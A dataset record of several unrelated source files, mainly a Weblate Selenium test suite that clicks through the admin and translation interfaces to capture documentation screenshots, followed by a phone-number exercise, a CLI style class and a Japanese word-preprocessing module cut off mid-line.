@override_settings(WEBLATE_GPG_IDENTITY=\"Weblate \")\n def test_gpg(self):\n with self.wait_for_page_load():\n self.click(self.driver.find_element(By.PARTIAL_LINK_TEXT, \"About Weblate\"))\n with self.wait_for_page_load():\n self.click(self.driver.find_element(By.PARTIAL_LINK_TEXT, \"Keys\"))\n self.screenshot(\"about-gpg.png\")\n\n def test_ssh(self):\n \"\"\"Test SSH admin interface.\"\"\"\n self.open_admin()\n\n time.sleep(0.5)\n self.screenshot(\"admin.png\")\n\n # Open SSH page\n with self.wait_for_page_load():\n self.click(\"SSH keys\")\n\n # Generate SSH key\n if get_key_data() is None:\n with self.wait_for_page_load():\n self.click(htmlid=\"generate-ssh-button\")\n\n # Add SSH host key\n self.driver.find_element(By.ID, \"id_host\").send_keys(\"github.com\")\n with self.wait_for_page_load():\n self.click(htmlid=\"ssh-add-button\")\n\n self.screenshot(\"ssh-keys-added.png\")\n\n # Open SSH page for final screenshot\n with self.wait_for_page_load():\n self.click(\"SSH keys\")\n self.screenshot(\"ssh-keys.png\")\n\n def create_component(self):\n project = Project.objects.create(name=\"WeblateOrg\", slug=\"weblateorg\")\n Component.objects.create(\n name=\"Language names\",\n slug=\"language-names\",\n project=project,\n repo=\"https://github.com/WeblateOrg/demo.git\",\n filemask=\"weblate/langdata/locale/*/LC_MESSAGES/django.po\",\n new_base=\"weblate/langdata/locale/django.pot\",\n file_format=\"po\",\n )\n Component.objects.create(\n name=\"Django\",\n slug=\"django\",\n project=project,\n repo=\"weblate://weblateorg/language-names\",\n filemask=\"weblate/locale/*/LC_MESSAGES/django.po\",\n new_base=\"weblate/locale/django.pot\",\n file_format=\"po\",\n )\n return project\n\n def view_site(self):\n with self.wait_for_page_load():\n self.click(htmlid=\"return-to-weblate\")\n\n def test_dashboard(self):\n self.do_login()\n # Generate nice changes data\n for day in range(365):\n for _unused in range(int(10 + 10 * math.sin(2 * math.pi * day / 30))):\n change = Change.objects.create(action=Change.ACTION_CREATE_PROJECT)\n change.timestamp -= timedelta(days=day)\n change.save()\n\n # Render activity\n self.click(\"Insights\")\n self.click(\"Activity\")\n time.sleep(0.5)\n self.screenshot(\"activity.png\")\n\n # Screenshot search\n self.click(\"Search\")\n self.screenshot(\"search.png\")\n\n @override_settings(AUTHENTICATION_BACKENDS=TEST_BACKENDS)\n def test_auth_backends(self):\n try:\n # psa creates copy of settings...\n orig_backends = social_django.utils.BACKENDS\n social_django.utils.BACKENDS = TEST_BACKENDS\n user = self.do_login()\n user.social_auth.create(provider=\"google-oauth2\", uid=user.email)\n user.social_auth.create(provider=\"github\", uid=\"123456\")\n user.social_auth.create(provider=\"bitbucket\", uid=\"weblate\")\n self.click(htmlid=\"user-dropdown\")\n with self.wait_for_page_load():\n self.click(htmlid=\"settings-button\")\n self.click(\"Account\")\n self.screenshot(\"authentication.png\")\n finally:\n social_django.utils.BACKENDS = orig_backends\n\n def test_screenshots(self):\n \"\"\"Screenshot tests.\"\"\"\n text = (\n \"Automatic translation via machine translation uses active \"\n \"machine translation engines to get the best possible \"\n \"translations and applies them in this project.\"\n )\n self.create_component()\n language = Language.objects.get(code=\"cs\")\n\n source = Unit.objects.get(\n source=text, translation__language=language\n ).source_unit\n source.explanation = \"Help text for automatic translation tool\"\n source.save()\n glossary = Glossary.objects.get()\n Term.objects.create(\n user=None,\n glossary=glossary,\n language=language,\n source=\"machine translation\",\n target=\"strojový překlad\",\n )\n Term.objects.create(\n user=None,\n glossary=glossary,\n language=language,\n source=\"project\",\n target=\"projekt\",\n )\n source.translation.component.alert_set.all().delete()\n\n def capture_unit(name, tab):\n unit = Unit.objects.get(source=text, translation__language=language)\n with self.wait_for_page_load():\n self.driver.get(f\"{self.live_server_url}{unit.get_absolute_url()}\")\n self.click(htmlid=tab)\n self.screenshot(name)\n with self.wait_for_page_load():\n self.click(\"Dashboard\")\n\n def wait_search():\n WebDriverWait(self.driver, 30).until(\n presence_of_element_located(\n (By.XPATH, '//tbody[@id=\"search-results\"]/tr')\n )\n )\n\n self.do_login(superuser=True)\n capture_unit(\"source-information.png\", \"toggle-nearby\")\n self.click(htmlid=\"projects-menu\")\n with self.wait_for_page_load():\n self.click(\"Browse all projects\")\n with self.wait_for_page_load():\n self.click(\"WeblateOrg\")\n with self.wait_for_page_load():\n self.click(\"Django\")\n self.click(\"Manage\")\n with self.wait_for_page_load():\n self.click(\"Screenshots\")\n\n # Upload screenshot\n self.driver.find_element(By.ID, \"id_name\").send_keys(\"Automatic translation\")\n element = self.driver.find_element(By.ID, \"id_image\")\n element.send_keys(\n element._upload(get_test_file(\"screenshot.png\")) # noqa: SLF001\n )\n with self.wait_for_page_load():\n element.submit()\n\n # Perform OCR\n if weblate.screenshots.views.HAS_OCR:\n self.click(htmlid=\"screenshots-auto\")\n wait_search()\n\n self.screenshot(\"screenshot-ocr.png\")\n\n # Add string manually\n self.driver.find_element(By.ID, \"search-input\").send_keys(f\"'{text}'\")\n self.click(htmlid=\"screenshots-search\")\n wait_search()\n self.click(self.driver.find_element(By.CLASS_NAME, \"add-string\"))\n\n # Unit should have screenshot assigned now\n capture_unit(\"screenshot-context.png\", \"toggle-machinery\")\n\n def test_admin(self):\n \"\"\"Test admin interface.\"\"\"\n ConfigurationError.objects.create(\n name=\"test\", message=\"Testing configuration error\"\n )\n self.do_login(superuser=True)\n self.screenshot(\"admin-wrench.png\")\n self.create_component()\n # Open admin page\n self.open_admin(login=False)\n\n # Component list\n with self.wait_for_page_load():\n self.click(\"Component lists\")\n with self.wait_for_page_load():\n self.click(self.driver.find_element(By.CLASS_NAME, \"addlink\"))\n element = self.driver.find_element(By.ID, \"id_name\")\n element.send_keys(\"All components\")\n self.click(\"Add another Automatic component list assignment\")\n self.clear_field(\n self.driver.find_element(By.ID, \"id_autocomponentlist_set-0-project_match\")\n ).send_keys(\"^.*$\")\n self.clear_field(\n self.driver.find_element(\n By.ID, \"id_autocomponentlist_set-0-component_match\"\n )\n ).send_keys(\"^.*$\")\n self.screenshot(\"componentlist-add.png\")\n with self.wait_for_page_load():\n element.submit()\n\n # Ensure the component list is there\n with self.wait_for_page_load():\n self.click(\"All components\")\n\n # Announcement\n with self.wait_for_page_load():\n self.click(\"Weblate translations\")\n with self.wait_for_page_load():\n self.click(\"Announcements\")\n with self.wait_for_page_load():\n self.click(self.driver.find_element(By.CLASS_NAME, \"addlink\"))\n Select(self.driver.find_element(By.ID, \"id_project\")).select_by_visible_text(\n \"WeblateOrg\"\n )\n element = self.driver.find_element(By.ID, \"id_message\")\n element.send_keys(\"Translations will be used only if they reach 60%.\")\n self.screenshot(\"announcement.png\")\n with self.wait_for_page_load():\n element.submit()\n with self.wait_for_page_load():\n self.click(self.driver.find_element(By.CLASS_NAME, \"addlink\"))\n Select(self.driver.find_element(By.ID, \"id_language\")).select_by_visible_text(\n \"Czech\"\n )\n element = self.driver.find_element(By.ID, \"id_message\")\n element.send_keys(\"Czech translators rock!\")\n with self.wait_for_page_load():\n element.submit()\n\n # Announcement display\n self.view_site()\n self.click(htmlid=\"projects-menu\")\n with self.wait_for_page_load():\n self.click(\"Browse all projects\")\n with self.wait_for_page_load():\n self.click(\"WeblateOrg\")\n self.click(\"Manage\")\n self.click(\"Post announcement\")\n self.screenshot(\"announcement-project.png\")\n\n with self.wait_for_page_load():\n self.click(\"Dashboard\")\n self.click(htmlid=\"languages-menu\")\n with self.wait_for_page_load():\n self.click(\"Browse all languages\")\n with self.wait_for_page_load():\n self.click(\"Czech\")\n self.screenshot(\"announcement-language.png\")\n\n def test_weblate(self):\n user = self.open_admin()\n language_regex = \"^(cs|he|hu)$\"\n\n # Add project\n with self.wait_for_page_load():\n self.click(\"Projects\")\n with self.wait_for_page_load():\n self.click(self.driver.find_element(By.CLASS_NAME, \"addlink\"))\n self.driver.find_element(By.ID, \"id_name\").send_keys(\"WeblateOrg\")\n Select(self.driver.find_element(By.ID, \"id_access_control\")).select_by_value(\n \"1\"\n )\n self.driver.find_element(By.ID, \"id_web\").send_keys(\"https://weblate.org/\")\n self.driver.find_element(By.ID, \"id_instructions\").send_keys(\n \"https://weblate.org/contribute/\"\n )\n self.screenshot(\"add-project.png\")\n with self.wait_for_page_load():\n self.driver.find_element(By.ID, \"id_name\").submit()\n\n # Add bilingual component\n with self.wait_for_page_load():\n self.click(\"Home\")\n with self.wait_for_page_load():\n self.click(\"Components\")\n with self.wait_for_page_load():\n self.click(self.driver.find_element(By.CLASS_NAME, \"addlink\"))\n\n self.driver.find_element(By.ID, \"id_name\").send_keys(\"Language names\")\n Select(self.driver.find_element(By.ID, \"id_project\")).select_by_visible_text(\n \"WeblateOrg\"\n )\n self.driver.find_element(By.ID, \"id_repo\").send_keys(\n \"https://github.com/WeblateOrg/demo.git\"\n )\n self.driver.find_element(By.ID, \"id_repoweb\").send_keys(\n \"https://github.com/WeblateOrg/demo/blob/\"\n \"{{branch}}/{{filename}}#L{{line}}\"\n )\n self.driver.find_element(By.ID, \"id_filemask\").send_keys(\n \"weblate/langdata/locale/*/LC_MESSAGES/django.po\"\n )\n self.driver.find_element(By.ID, \"id_new_base\").send_keys(\n \"weblate/langdata/locale/django.pot\"\n )\n Select(self.driver.find_element(By.ID, \"id_file_format\")).select_by_value(\"po\")\n Select(self.driver.find_element(By.ID, \"id_license\")).select_by_value(\n \"GPL-3.0-or-later\"\n )\n self.clear_field(\n self.driver.find_element(By.ID, \"id_language_regex\")\n ).send_keys(language_regex)\n self.screenshot(\"add-component.png\")\n # This takes long\n with self.wait_for_page_load(timeout=1200):\n self.driver.find_element(By.ID, \"id_name\").submit()\n with self.wait_for_page_load():\n self.click(\"Language names\")\n\n # Add monolingual component\n with self.wait_for_page_load():\n self.click(\"Components\")\n with self.wait_for_page_load():\n self.click(self.driver.find_element(By.CLASS_NAME, \"addlink\"))\n self.driver.find_element(By.ID, \"id_name\").send_keys(\"Android\")\n Select(self.driver.find_element(By.ID, \"id_project\")).select_by_visible_text(\n \"WeblateOrg\"\n )\n self.driver.find_element(By.ID, \"id_repo\").send_keys(\n \"weblate://weblateorg/language-names\"\n )\n self.driver.find_element(By.ID, \"id_filemask\").send_keys(\n \"app/src/main/res/values-*/strings.xml\"\n )\n self.driver.find_element(By.ID, \"id_template\").send_keys(\n \"app/src/main/res/values/strings.xml\"\n )\n Select(self.driver.find_element(By.ID, \"id_file_format\")).select_by_value(\n \"aresource\"\n )\n Select(self.driver.find_element(By.ID, \"id_license\")).select_by_value(\"MIT\")\n self.screenshot(\"add-component-mono.png\")\n # This takes long\n with self.wait_for_page_load(timeout=1200):\n self.driver.find_element(By.ID, \"id_name\").submit()\n with self.wait_for_page_load():\n self.click(\"Android\")\n\n # Load Weblate project page\n self.view_site()\n self.click(htmlid=\"projects-menu\")\n with self.wait_for_page_load():\n self.click(\"Browse all projects\")\n with self.wait_for_page_load():\n self.click(\"WeblateOrg\")\n\n self.screenshot(\"project-overview.png\")\n\n # User management\n self.click(\"Manage\")\n with self.wait_for_page_load():\n self.click(\"Users\")\n element = self.driver.find_element(By.ID, \"id_user\")\n element.send_keys(\"testuser\")\n with self.wait_for_page_load():\n element.submit()\n with self.wait_for_page_load():\n self.click(\"Manage users\")\n self.screenshot(\"manage-users.png\")\n # Access control setings\n self.click(htmlid=\"projects-menu\")\n with self.wait_for_page_load():\n self.click(\"WeblateOrg\")\n self.click(\"Manage\")\n with self.wait_for_page_load():\n self.click(\"Settings\")\n self.click(\"Access\")\n self.screenshot(\"project-access.png\")\n self.click(\"Workflow\")\n self.screenshot(\"project-workflow.png\")\n # The project is now watched\n self.click(htmlid=\"projects-menu\")\n with self.wait_for_page_load():\n self.click(\"WeblateOrg\")\n\n # Engage page\n self.click(\"Share\")\n with self.wait_for_page_load():\n self.click(\"Status widgets\")\n self.screenshot(\"promote.png\")\n with self.wait_for_page_load():\n self.click(htmlid=\"engage-link\")\n self.screenshot(\"engage.png\")\n with self.wait_for_page_load():\n self.click(htmlid=\"engage-project\")\n\n # Glossary\n with self.wait_for_page_load():\n self.click(\"Glossaries\")\n with self.wait_for_page_load():\n self.click(self.driver.find_element(By.PARTIAL_LINK_TEXT, \"Czech\"))\n self.click(\"Add new word\")\n self.driver.find_element(By.ID, \"id_source\").send_keys(\"language\")\n element = self.driver.find_element(By.ID, \"id_target\")\n element.send_keys(\"jazyk\")\n with self.wait_for_page_load():\n element.submit()\n self.screenshot(\"glossary-edit.png\")\n self.click(htmlid=\"projects-menu\")\n with self.wait_for_page_load():\n self.click(\"WeblateOrg\")\n with self.wait_for_page_load():\n self.click(\"Glossaries\")\n self.screenshot(\"project-glossaries.png\")\n with self.wait_for_page_load():\n self.click(\"WeblateOrg\")\n\n # Addons\n self.click(\"Components\")\n with self.wait_for_page_load():\n self.click(\"Language names\")\n self.click(\"Manage\")\n with self.wait_for_page_load():\n self.click(\"Addons\")\n self.screenshot(\"addons.png\")\n with self.wait_for_page_load():\n self.click(\n self.driver.find_element(\n By.XPATH, '//button[@data-addon=\"weblate.discovery.discovery\"]'\n )\n )\n element = self.driver.find_element(By.ID, \"id_match\")\n element.send_keys(\n \"weblate/locale/(?P[^/]*)/LC_MESSAGES/\"\n \"(?P[^/]*)\\\\.po\"\n )\n self.clear_field(\n self.driver.find_element(By.ID, \"id_language_regex\")\n ).send_keys(language_regex)\n self.driver.find_element(By.ID, \"id_new_base_template\").send_keys(\n \"weblate/locale/{{ component }}.pot\"\n )\n self.clear_field(self.driver.find_element(By.ID, \"id_name_template\")).send_keys(\n \"{{ component|title }}\"\n )\n Select(self.driver.find_element(By.ID, \"id_file_format\")).select_by_value(\"po\")\n with self.wait_for_page_load():\n element.submit()\n self.screenshot(\"addon-discovery.png\")\n element = self.driver.find_element(By.ID, \"id_confirm\")\n self.click(element)\n # This takes long\n with self.wait_for_page_load(timeout=1200):\n element.submit()\n with self.wait_for_page_load():\n self.click(\"Language names\")\n\n # Reports\n self.click(\"Insights\")\n self.click(\"Translation reports\")\n self.click(\"Insights\")\n self.screenshot(\"reporting.png\")\n\n # Contributor agreeement\n self.click(\"Manage\")\n with self.wait_for_page_load():\n self.click(\"Settings\")\n element = self.driver.find_element(By.ID, \"id_agreement\")\n element.send_keys(\"This is an agreement.\")\n with self.wait_for_page_load():\n element.submit()\n with self.wait_for_page_load():\n self.click(\"Language names\")\n self.screenshot(\"contributor-agreement.png\")\n with self.wait_for_page_load():\n self.click(\"View contributor agreement\")\n element = self.driver.find_element(By.ID, \"id_confirm\")\n self.click(element)\n with self.wait_for_page_load():\n element.submit()\n\n # Translation page\n with self.wait_for_page_load():\n self.click(\"Czech\")\n with self.wait_for_page_load():\n self.click(\"Django\")\n self.screenshot(\"strings-to-check.png\")\n self.click(\"Files\")\n self.click(\"Upload translation\")\n self.click(\"Files\")\n self.screenshot(\"export-import.png\")\n self.click(\"Tools\")\n self.click(\"Automatic translation\")\n self.click(htmlid=\"id_select_auto_source_2\")\n self.click(\"Tools\")\n self.screenshot(\"automatic-translation.png\")\n self.click(\"Search\")\n element = self.driver.find_element(By.ID, \"id_q\")\n element.send_keys(\"'%(count)s word'\")\n with self.wait_for_page_load():\n element.submit()\n self.click(\"History\")\n self.screenshot(\"format-highlight.png\")\n self.click(\"Comments\")\n self.screenshot(\"plurals.png\")\n\n # Test search dropdown\n dropdown = self.driver.find_element(By.ID, \"query-dropdown\")\n dropdown.click()\n time.sleep(0.5)\n self.screenshot(\"query-dropdown.png\")\n with self.wait_for_page_load():\n self.click(\n self.driver.find_element(By.PARTIAL_LINK_TEXT, \"Not translated strings\")\n )\n self.driver.find_element(By.ID, \"id_34a4642999e44a2b_0\")\n\n # Test sort dropdown\n sort = self.driver.find_element(By.ID, \"query-sort-dropdown\")\n sort.click()\n time.sleep(0.5)\n self.screenshot(\"query-sort.png\")\n with self.wait_for_page_load():\n self.click(\"Position\")\n\n # Return to original unit\n element = self.driver.find_element(By.ID, \"id_q\")\n self.clear_field(element)\n element.send_keys(\"'%(count)s word'\")\n with self.wait_for_page_load():\n element.submit()\n\n # Trigger check\n self.clear_field(self.driver.find_element(By.ID, \"id_a2a808c8ccbece08_0\"))\n element = self.driver.find_element(By.ID, \"id_a2a808c8ccbece08_1\")\n self.clear_field(element)\n element.send_keys(\"několik slov\")\n with self.wait_for_page_load():\n element.submit()\n self.screenshot(\"checks.png\")\n\n # Secondary language display\n user.profile.secondary_languages.set(Language.objects.filter(code__in=(\"he\",)))\n with self.wait_for_page_load():\n self.click(\"Czech\")\n with self.wait_for_page_load():\n self.click(self.driver.find_element(By.PARTIAL_LINK_TEXT, \"All strings\"))\n self.click(\"Other languages\")\n self.screenshot(\"secondary-language.png\")\n\n # RTL translation\n with self.wait_for_page_load():\n self.click(\"Django\")\n with self.wait_for_page_load():\n self.click(\"Hebrew\")\n with self.wait_for_page_load():\n self.click(self.driver.find_element(By.PARTIAL_LINK_TEXT, \"All strings\"))\n self.screenshot(\"visual-keyboard.png\")\n\n # Profile\n self.click(htmlid=\"user-dropdown\")\n with self.wait_for_page_load():\n self.click(htmlid=\"settings-button\")\n self.click(\"Preferences\")\n self.screenshot(\"dashboard-dropdown.png\")\n self.click(\"Notifications\")\n self.screenshot(\"profile-subscriptions.png\")\n self.click(\"Licenses\")\n self.screenshot(\"profile-licenses.png\")\n\n # Dashboard\n with self.wait_for_page_load():\n self.click(\"Dashboard\")\n self.screenshot(\"your-translations.png\")\n\n @modify_settings(INSTALLED_APPS={\"append\": \"weblate.billing\"})\n def test_add_component(self):\n \"\"\"Test user adding project and component.\"\"\"\n user = self.do_login()\n create_test_billing(user)\n\n # Open billing page\n self.click(htmlid=\"user-dropdown\")\n with self.wait_for_page_load():\n self.click(htmlid=\"billing-button\")\n self.screenshot(\"user-billing.png\")\n\n # Click on add project\n with self.wait_for_page_load():\n self.click(self.driver.find_element(By.CLASS_NAME, \"billing-add-project\"))\n\n # Add project\n self.driver.find_element(By.ID, \"id_name\").send_keys(\"WeblateOrg\")\n self.driver.find_element(By.ID, \"id_web\").send_keys(\"https://weblate.org/\")\n self.driver.find_element(By.ID, \"id_instructions\").send_keys(\n \"https://weblate.org/contribute/\"\n )\n self.screenshot(\"user-add-project.png\")\n with self.wait_for_page_load():\n self.driver.find_element(By.ID, \"id_name\").submit()\n self.screenshot(\"user-add-project-done.png\")\n\n # Click on add component\n with self.wait_for_page_load():\n self.click(self.driver.find_element(By.CLASS_NAME, \"project-add-component\"))\n\n # Add component\n self.driver.find_element(By.ID, \"id_name\").send_keys(\"Language names\")\n self.driver.find_element(By.ID, \"id_repo\").send_keys(\n \"https://github.com/WeblateOrg/demo.git\"\n )\n self.screenshot(\"user-add-component-init.png\")\n with self.wait_for_page_load(timeout=1200):\n self.driver.find_element(By.ID, \"id_name\").submit()\n\n self.screenshot(\"user-add-component-discovery.png\")\n self.driver.find_element(By.ID, \"id_id_discovery_0_1\").click()\n with self.wait_for_page_load(timeout=1200):\n self.driver.find_element(By.ID, \"id_name\").submit()\n\n self.driver.find_element(By.ID, \"id_repoweb\").send_keys(\n \"https://github.com/WeblateOrg/demo/blob/\"\n \"{{branch}}/{{filename}}#L{{line}}\"\n )\n self.driver.find_element(By.ID, \"id_filemask\").send_keys(\n \"weblate/langdata/locale/*/LC_MESSAGES/django.po\"\n )\n self.driver.find_element(By.ID, \"id_new_base\").send_keys(\n \"weblate/langdata/locale/django.pot\"\n )\n Select(self.driver.find_element(By.ID, \"id_file_format\")).select_by_value(\"po\")\n Select(self.driver.find_element(By.ID, \"id_license\")).select_by_value(\n \"GPL-3.0-or-later\"\n )\n self.clear_field(\n self.driver.find_element(By.ID, \"id_language_regex\")\n ).send_keys(\"^(cs|he|hu)$\")\n self.screenshot(\"user-add-component.png\")\n\n def test_alerts(self):\n project = Project.objects.create(name=\"WeblateOrg\", slug=\"weblateorg\")\n Component.objects.create(\n name=\"Duplicates\",\n slug=\"duplicates\",\n project=project,\n repo=\"https://github.com/WeblateOrg/test.git\",\n filemask=\"po-duplicates/*.dpo\",\n new_base=\"po-duplicates/hello.pot\",\n file_format=\"po\",\n )\n self.do_login(superuser=True)\n self.click(htmlid=\"projects-menu\")\n with self.wait_for_page_load():\n self.click(\"Browse all projects\")\n with self.wait_for_page_load():\n self.click(\"WeblateOrg\")\n with self.wait_for_page_load():\n self.click(\"Duplicates\")\n self.click(\"Alerts\")\n self.screenshot(\"alerts.png\")\n\n self.click(\"Manage\")\n with self.wait_for_page_load():\n self.click(\"Community localization checklist\")\n self.screenshot(\"guide.png\")\n\n def test_fonts(self):\n self.create_component()\n self.do_login(superuser=True)\n self.click(htmlid=\"projects-menu\")\n with self.wait_for_page_load():\n self.click(\"Browse all projects\")\n with self.wait_for_page_load():\n self.click(\"WeblateOrg\")\n self.click(\"Manage\")\n with self.wait_for_page_load():\n self.click(\"Fonts\")\n\n self.click(htmlid=\"tab_fonts\")\n\n # Upload font\n element = self.driver.find_element(By.ID, \"id_font\")\n element.send_keys(element._upload(FONT)) # noqa: SF01,SLF001\n with self.wait_for_page_load():\n self.click(htmlid=\"upload_font_submit\")\n\n self.screenshot(\"font-edit.png\")\n\n with self.wait_for_page_load():\n self.click(\"Fonts\")\n\n # Upload second font\n element = self.driver.find_element(By.ID, \"id_font\")\n element.send_keys(element._upload(SOURCE_FONT)) # noqa: SF01,SLF001\n with self.wait_for_page_load():\n self.click(htmlid=\"upload_font_submit\")\n\n with self.wait_for_page_load():\n self.click(\"Fonts\")\n\n self.screenshot(\"font-list.png\")\n\n self.click(htmlid=\"tab_groups\")\n\n # Create group\n Select(self.driver.find_element(By.ID, \"id_group_font\")).select_by_visible_text(\n \"Source Sans Pro Bold\"\n )\n element = self.driver.find_element(By.ID, \"id_group_name\")\n element.send_keys(\"default-font\")\n with self.wait_for_page_load():\n element.submit()\n\n Select(self.driver.find_element(By.ID, \"id_font\")).select_by_visible_text(\n \"Droid Sans Fallback Regular\"\n )\n element = self.driver.find_element(By.ID, \"id_language\")\n Select(element).select_by_visible_text(\"Japanese\")\n with self.wait_for_page_load():\n element.submit()\n Select(self.driver.find_element(By.ID, \"id_font\")).select_by_visible_text(\n \"Droid Sans Fallback Regular\"\n )\n element = self.driver.find_element(By.ID, \"id_language\")\n Select(element).select_by_visible_text(\"Korean\")\n with self.wait_for_page_load():\n element.submit()\n\n self.screenshot(\"font-group-edit.png\")\n\n with self.wait_for_page_load():\n self.click(\"Font groups\")\n\n self.screenshot(\"font-group-list.png\")\n\n def test_backup(self):\n self.create_temp()\n try:\n self.open_manage()\n self.screenshot(\"support.png\")\n with self.wait_for_page_load():\n self.click(\"Backups\")\n element = self.driver.find_element(By.ID, \"id_repository\")\n element.send_keys(self.tempdir)\n with self.wait_for_page_load():\n element.submit()\n with self.wait_for_page_load():\n self.click(self.driver.find_element(By.CLASS_NAME, \"runbackup\"))\n self.click(self.driver.find_element(By.CLASS_NAME, \"createdbackup\"))\n time.sleep(0.5)\n self.screenshot(\"backups.png\")\n finally:\n self.remove_temp()\n\n def test_explanation(self):\n project = self.create_component()\n Component.objects.create(\n name=\"Android\",\n slug=\"android\",\n project=project,\n repo=\"weblate://weblateorg/language-names\",\n filemask=\"app/src/main/res/values-*/strings.xml\",\n template=\"app/src/main/res/values/strings.xml\",\n file_format=\"aresource\",\n )\n\n self.do_login(superuser=True)\n self.click(htmlid=\"projects-menu\")\n with self.wait_for_page_load():\n self.click(\"Browse all projects\")\n with self.wait_for_page_load():\n self.click(\"WeblateOrg\")\n self.click(\"Manage\")\n with self.wait_for_page_load():\n self.click(\"Labels\")\n element = self.driver.find_element(By.ID, \"id_name\")\n element.send_keys(\"Current sprint\")\n self.click(self.driver.find_element(By.CLASS_NAME, \"label-green\"))\n with self.wait_for_page_load():\n element.submit()\n element = self.driver.find_element(By.ID, \"id_name\")\n element.send_keys(\"Next sprint\")\n self.click(self.driver.find_element(By.CLASS_NAME, \"label-aqua\"))\n with self.wait_for_page_load():\n element.submit()\n self.screenshot(\"labels.png\")\n\n # Navigate to component\n with self.wait_for_page_load():\n self.click(\"WeblateOrg\")\n with self.wait_for_page_load():\n self.click(\"Android\")\n\n # Edit variant configuration\n self.click(\"Manage\")\n with self.wait_for_page_load():\n self.click(\"Settings\")\n self.click(\"Translation\")\n element = self.driver.find_element(By.ID, \"id_variant_regex\")\n element.send_keys(\"_(short|min)$\")\n self.screenshot(\"variants-settings.png\")\n with self.wait_for_page_load():\n element.submit()\n\n # Navigate to the source language\n with self.wait_for_page_load():\n self.click(\"Android\")\n with self.wait_for_page_load():\n self.click(\"English\")\n self.screenshot(\"source-review.png\")\n\n # Find string with variants\n self.click(\"Search\")\n element = self.driver.find_element(By.ID, \"id_q\")\n element.send_keys(\"Monday\")\n with self.wait_for_page_load():\n element.submit()\n self.screenshot(\"source-review-detail.png\")\n\n # Display variants\n self.click(htmlid=\"toggle-variants\")\n self.screenshot(\"variants-translate.png\")\n\n # Edit context\n self.click(htmlid=\"edit-context\")\n time.sleep(0.5)\n self.screenshot(\"source-review-edit.png\", scroll=False)\n\n # Close modal dialog\n self.driver.find_element(By.ID, \"id_extra_flags\").send_keys(Keys.ESCAPE)\n time.sleep(0.5)\n","repo_name":"imfht/djangoapps","sub_path":"weblate-master/weblate/trans/tests/test_selenium.py","file_name":"test_selenium.py","file_ext":"py","file_size_in_byte":43812,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"95"} +{"seq_id":"5108923200","text":"import collections\nfrom PyInquirer import style_from_dict, Token\nimport colorama\n\n\"\"\"\n@author: tiannamen (FernandoNSC5)\n12/08/2021\n\"\"\"\nclass Style():\n\n def __init__(self):\n colorama.init()\n self.__loadStyles()\n self.__loadColors()\n\n def __loadColors(self):\n self.RED = colorama.Fore.RED\n self.GREEN = colorama.Fore.GREEN\n self.CYAN = colorama.Fore.CYAN\n self.MAGENTA = colorama.Fore.LIGHTMAGENTA_EX\n self.RESET = colorama.Fore.RESET\n\n def __loadStyles(self):\n self.CLI_FORMAT = style_from_dict({\n Token.Separator: '#cc5454',\n Token.QuestionMark: '#673ab7 bold',\n Token.Selected: '#cc5454', # default\n Token.Pointer: '#673ab7 bold',\n Token.Instruction: '', # default\n Token.Answer: '#f44336 bold',\n Token.Question: '',\n })","repo_name":"FernandoNSC5/ConfectoryCLI","sub_path":"assets/Style.py","file_name":"Style.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"31684224063","text":"f_in = open('input.txt', 'r', encoding='utf8')\n\n\ndef clean_row(wta):\n waste = {'-', '(', ')'}\n for i in waste:\n if i in wta:\n wta = wta.replace(i, '')\n return wta\n\n\ndef contact_list(raw_number):\n if len(raw_number) > 7:\n return {raw_number[-7:], raw_number[-10:-7]}\n elif len(raw_number) == 7:\n return {raw_number[-7:], '495'}\n\n\nkey, phone_dict = 0, {}\nfor row in f_in:\n phone_dict[key] = contact_list(clean_row(row.strip()))\n key += 1\n\nfor key in phone_dict:\n if key == 0:\n pass\n else:\n if phone_dict[0] == phone_dict[key]:\n print('YES')\n else:\n print('NO')\n","repo_name":"Maksym-Kryvenko/sb_gitClasses","sub_path":"coursera_practice/week.7/pr.7_12.py","file_name":"pr.7_12.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"1791685138","text":"from morpheme import WordParser\nimport re\nfrom util import load_config\nimport logging\nlogging.config.dictConfig(load_config('log'))\nlogger = logging.getLogger(__name__)\n\nclass Word():\n __REGEX_JA = re.compile(r'[ぁ-んァ-ン一-龥]')\n __REGEX_EN = re.compile(r'[a-z]+', re.IGNORECASE)\n __REGEX_STOP_CHAR = re.compile(r'^([ァ-ン]|[ぁ-ん]{1,2})$', re.IGNORECASE)\n\n __PTN_DIGIT_ALL = r'[一二三四五六七八九十\\d]'\n\n __REGEXES_REPLACE = (\n (re.compile(r'大学$'), '大学'),\n (re.compile(r'新聞$'), '新聞'),\n (re.compile(r'^JR'), 'JR'),\n (re.compile(r'受験$'), '受験'),\n (re.compile(r'姉妹$'), '姉妹'),\n (re.compile(r'^iPhone{}$'.format(__PTN_DIGIT_ALL)), 'iPhone'),\n )\n\n __REGEXES_EXCLUDE = (\n re.compile(r'^{}+日目?$'.format(__PTN_DIGIT_ALL)),\n re.compile(r'^{}+年(生|生まれ)?$'.format(__PTN_DIGIT_ALL)),\n re.compile(r'^{}+期生$'.format(__PTN_DIGIT_ALL)),\n re.compile(r'^{}+(月|人|歳|才|児)$'.format(__PTN_DIGIT_ALL)),\n re.compile(r'^{}+万?円?$'.format(__PTN_DIGIT_ALL)),\n re.compile(r'^{}+(戦|敗|勝|度)$'.format(__PTN_DIGIT_ALL)),\n re.compile(r'(出身|県)$'),\n re.compile(r'キロ$'),\n re.compile('ごめん'),\n re.compile('決定'),\n re.compile('注意'),\n )\n\n def __init__(self):\n file_config = load_config('file')\n self.__parser = WordParser(**file_config['mecab'])\n with open(file_config['word']['stop_words']) as f:\n self.__stop_words = frozenset(f.read().rstrip().split('\\n'))\n\n def preprocess(self, text):\n words_processed = []\n morphs = self.__parser(text)\n for morph in morphs:\n morph.lexeme = self.__clean(morph.lexeme)\n if self.__valid(morph):\n words_processed.append(morph.lexeme)\n return words_processed\n\n def __clean(self, word):\n for regex, rep_word in self.__REGEXES_REPLACE:\n if regex.search(word):\n word = rep_word\n break\n\n for regex in self.__REGEXES_EXCLUDE:\n if regex.search(word):\n word = None\n break\n\n return word\n\n def __valid(self, morph):\n \"\"\"\n 原型をチェック\n 英語・カタカナ1文字だけ、ひらがな1文字or2文字は省く\n \"\"\"\n if morph.lexeme is None or morph.lexeme == '':\n return False\n\n if not 